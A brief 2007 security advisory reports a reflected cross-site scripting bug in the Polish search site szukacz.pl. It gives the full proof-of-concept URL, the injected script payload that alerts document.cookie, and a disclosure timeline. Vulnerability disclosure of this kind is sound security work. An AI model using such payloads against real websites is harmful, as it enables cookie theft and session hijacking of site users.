kanedaaa... ... borys ... bohater ...
+ Subject:
XSS bug for www.szukacz.pl
+ Version:
2007.03.04
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ szukacz.pl Description:
Very useful polish search site.
+ Description:
XSS IN:
http://www.szukacz.pl/szukaj.aspx?enc=iso-8859-2&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ct=polska
Sent data:
"><script>alert(document.cookie);</script>
Its nothing special, because this site is just search site without any kind of authentication.
Timeline:
2007.03.04 bug discovered
2007.03.04 "/" bug sent via mail from http://www.szukacz.pl
Original Advisory: http://kaneda.bohater.net/security/20070304-xss-szukacz.pl.php
Check my other bugs in security section: Security